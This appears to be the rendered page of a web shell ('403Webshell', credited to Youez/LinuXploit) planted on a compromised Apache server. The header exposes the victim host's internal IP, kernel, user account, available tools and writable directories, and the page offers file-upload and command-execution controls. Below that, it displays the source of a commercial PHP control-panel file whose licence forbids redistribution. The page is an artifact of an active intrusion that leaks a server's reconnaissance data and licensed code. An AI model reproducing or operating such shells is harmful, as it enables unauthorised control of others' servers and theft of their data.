403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/usafundingapplications.org/vsa/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/usafundingapplications.org/vsa/linksettings.php
<?php
/*
Copyright (c) 2007-present InnAnTech Industries
Author: Dave Guindon
Web: www.VirtualSmartAgent.com
Support: www.DaveGuindonSupport.com

Please send bug reports, suggestions and/or feedback to the support
website given above.

Virtual Smart Agent is a commercial software. Any distribution is strictly prohibited
unless a resale rights license was delivered along with this software.
*/

include('myauth.php');
include('modfiles/db.php');
include('globals.php');
include('charts/tables.php');
include('charts/html_table.class.php');
include('panelfunctions.php');
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<LINK href="style.css" type=text/css rel=stylesheet>
<title>Virtual Agent Control Panel</title>
<?php echo $thickboxfiles; ?>
</head>
<body>
<?php echo $menu; ?>
<table width="700" border="0" align="center" cellpadding="10" cellspacing="0" bgcolor="#FFFFFF" class="admin_grey_border">
  <tr>
    <td><div align="center"><strong>Links</strong><?php echo $errors; ?></div></td>
  </tr>
  <tr>
    <td><table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td><p>In this section you can create your own custom offer links to put in your agent messages. Each link will be tracked in this system for each agent and campaign.<br />
        </p></td>
      </tr>
      <tr>
        <td><hr class="grey_dashed" /></td>
      </tr>
      <tr>
        <td bgcolor="#<?php echo $sectioncolor; ?>">Custom Links | <a href="boxes/linksaddbox.php?cid=<?php echo $_SESSION['cid']; ?>&keepThis=true&TB_iframe=true&height=230&width=350&modal=true" title="Add" class="thickbox">Add New Link</a></td>
      </tr>
      <tr>
        <td><p><?php echo doLinksTable($_SESSION['cid']); ?> </p></td>
      </tr>
      <tr>
        <td><hr class="grey_dashed" /></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><div align="center"><?php echo $copyright; ?><?php echo $bottomlinks; ?></div></td>
  </tr>
</table>
<?php echo $cbottom; ?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit